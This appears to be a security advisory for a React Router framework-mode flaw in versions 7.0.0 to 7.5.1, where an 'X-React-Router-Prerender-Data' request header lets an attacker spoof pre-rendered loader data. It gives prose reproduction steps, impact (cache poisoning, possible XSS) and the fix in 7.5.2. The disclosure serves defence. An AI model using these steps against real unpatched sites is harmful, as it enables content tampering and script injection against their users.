React Router Pre-Rendered Data Spoofing Vulnerability

A vulnerability in React Router's server-side rendering (SSR) framework mode allows for the spoofing of pre-rendered data. This issue is present in versions 7.0.0 through 7.5.1. By adding a specific header, 'X-React-Router-Prerender-Data', to the request, an attacker can modify the data object values passed to the HTML. The vulnerability arises when a page loader is used, enabling the manipulation of the response data, which could lead to cache poisoning and potential cross-site scripting (XSS) attacks, depending on how the data is handled on the client side.

Impact

Exploitation of this vulnerability could result in unauthorized modification of pre-rendered data, allowing attackers to alter content served to users. If the application uses a caching mechanism, this could lead to persistent changes being delivered to users. Such an attack could also introduce cross-site scripting vulnerabilities, depending on how the manipulated data is used in the application.

Reproduction

To reproduce this vulnerability, first install React Router in Framework mode, ensuring the version is between 7.0.0 and 7.5.1. Create a page that utilizes a loader function. Access the page by appending '.data' to the URL, which retrieves the data object. Then, send a request to the page with the 'X-React-Router-Prerender-Data' header, including a JSON object that mimics the structure of the pre-rendered data but with altered values. The response will reflect the changes made, demonstrating the successful spoofing of the data.

Remediation

Users can upgrade to React Router version 7.5.2 or later, where this vulnerability has been patched.